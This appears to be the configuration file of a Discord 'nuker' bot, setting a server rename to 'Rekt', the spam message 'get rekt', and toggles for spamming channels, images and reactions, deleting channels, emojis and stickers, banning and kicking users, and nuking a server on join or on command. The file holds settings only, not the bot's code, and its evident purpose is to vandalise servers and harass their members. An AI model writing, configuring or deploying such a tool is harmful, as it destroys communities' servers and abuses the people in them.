new_server_name = "Rekt"
text_channel_name = "spam_text"
voice_channel_name = "spam_voice"
category_name = "spam_category"
spam_message = "get rekt"
spam_img = "spam_img.png"

num_spam_channels = 4

b_spam_text_channels = False
b_create_categories = False
b_create_voice_channels = True
b_create_text_channels = False
b_delete_text_channels = False
b_delete_voice_channels = False
b_delete_categories = False
b_ban_users = False
b_kick_users = False
b_delete_emojis = True
b_delete_stickers = False
b_replace_icon = False
b_replace_name = False
b_replace_banner = False
b_spam_images = False
b_spam_reacts = False
b_nuke_on_join = True
b_nuke_on_command = True
b_backup_on_command = True
b_backup_on_join = True
b_restore_on_command = True